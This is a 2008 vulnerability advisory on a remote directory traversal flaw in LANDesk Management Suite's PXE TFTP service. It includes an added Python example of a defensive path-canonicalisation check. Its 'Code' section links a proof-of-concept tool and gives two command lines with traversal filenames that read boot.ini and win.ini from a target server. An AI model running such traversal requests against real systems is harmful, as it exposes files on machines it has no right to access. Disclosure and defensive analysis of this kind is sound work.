#######################################################################
Luigi Auriemma
Application: LANDesk Management Suite
http://www.landesk.com/products/ldms/index.aspx
Versions: <= 8.80.1.1
Platforms: Windows
Bug: directory traversal
Exploitation: remote
Date: 01 Apr 2008
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
LANDesk is a well-known system management software suite.
#######################################################################
======
2) Bug
======
The PXE TFTP Service is vulnerable to a classic directory traversal
vulnerability that can be exploited by adding one or more characters
before the usual dotdot pattern.

The interesting thing is that version 8.80.1.1 was released just
to fix another directory traversal vulnerability.
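
Added example (not part of the original advisory and not LANDesk code):
a server-side filename check that canonicalises the requested name under
Windows path rules before testing containment, next to a hypothetical
prefix-only filter of the kind the bug description implies. The root
directory C:\tftproot, the function names and the last three sample
names are assumptions made for illustration.

```python
import ntpath  # Windows path rules on any host OS

TFTP_ROOT = r"C:\tftproot"  # assumed served directory (constructed)


def naive_is_safe(requested):
    """Hypothetical weak filter: rejects only names that START with dotdot."""
    return not requested.startswith(("..\\", "../"))


def resolve_request(requested, root=TFTP_ROOT):
    """Return the canonical path to serve, or None if it leaves the root."""
    # Drive letters, NTFS stream syntax and NULs are never valid here.
    if ":" in requested or "\x00" in requested:
        return None
    # Rooted or UNC names would make join() discard the root entirely.
    if requested.startswith(("\\", "/")):
        return None
    # Canonicalise first: normpath treats '/' and '\' alike and collapses
    # every "name\.." pair, whatever precedes the dotdot.
    root_norm = ntpath.normpath(root)
    full = ntpath.normpath(ntpath.join(root_norm, requested))
    # Then test containment on the canonical, case-folded form.
    if ntpath.normcase(full).startswith(ntpath.normcase(root_norm) + "\\"):
        return full
    return None


# The first two names are the ones quoted in section 3; the rest are constructed.
SAMPLES = [
    r"x\..\..\..\..\..\..\..\boot.ini",
    "what_you_want/../../../../../../../windows/win.ini",
    "pxelinux.0",
    r"images\x\..\menu.cfg",
    r"C:\boot.ini",
]

if __name__ == "__main__":
    for name in SAMPLES:
        print(f"{name!r}: naive={naive_is_safe(name)} "
              f"resolved={resolve_request(name)}")
```

The prefix-only filter accepts both names from section 3, while the
canonicalise-then-compare check rejects them and still serves files
that stay inside the root.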
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/tftpx.zip
  tftpx SERVER x\..\..\..\..\..\..\..\boot.ini none
  tftpx SERVER what_you_want/../../../../../../../windows/win.ini none
#######################################################################
======
4) Fix
======
No fix
#######################################################################
---
Luigi Auriemma
http://aluigi.org